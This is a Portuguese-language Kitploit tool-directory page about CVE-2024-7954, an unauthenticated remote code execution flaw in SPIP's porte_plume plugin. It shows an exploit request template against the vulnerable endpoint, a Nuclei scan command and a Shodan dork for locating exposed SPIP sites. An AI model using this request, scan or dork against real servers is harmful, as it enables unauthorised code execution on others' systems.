Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/0dayan0n/rce_cve-2024-7954-
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHub0dayan0n/rce_cve-2024-7954-

RCE_CVE-2024-7954-

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
2149há 1 anoAinda não revisado

Sobre

O plugin porte_plume usado pelo SPIP antes das versões 4.30-alpha2, 4.2.13 e 4.1.16 é vulnerável a uma vulnerabilidade de execução de código arbitrário. Um atacante remoto e não autenticado pode executar PHP arbitrário como o usuário do SPIP enviando uma solicitação HTTP maliciosa. (CRÍTICO)

Compartilhar

RCE_CVE-2024-7954-

O plugin porte_plume utilizado pelo SPIP antes das versões 4.30-alpha2, 4.2.13 e 4.1.16 é vulnerável a uma vulnerabilidade de execução arbitrária de código. Um atacante remoto e não autenticado pode executar PHP arbitrário como o usuário do SPIP ao enviar uma requisição HTTP manipulada. (CRÍTICO)

Exploit:

POST /index.php?action=porte_plume_previsu HTTP/1.1

Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

data=AA_[->URL]_BB

Ferramenta Utilizada:

Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml

Shodan Dork:

app="SPIP"

Baixar ferramenta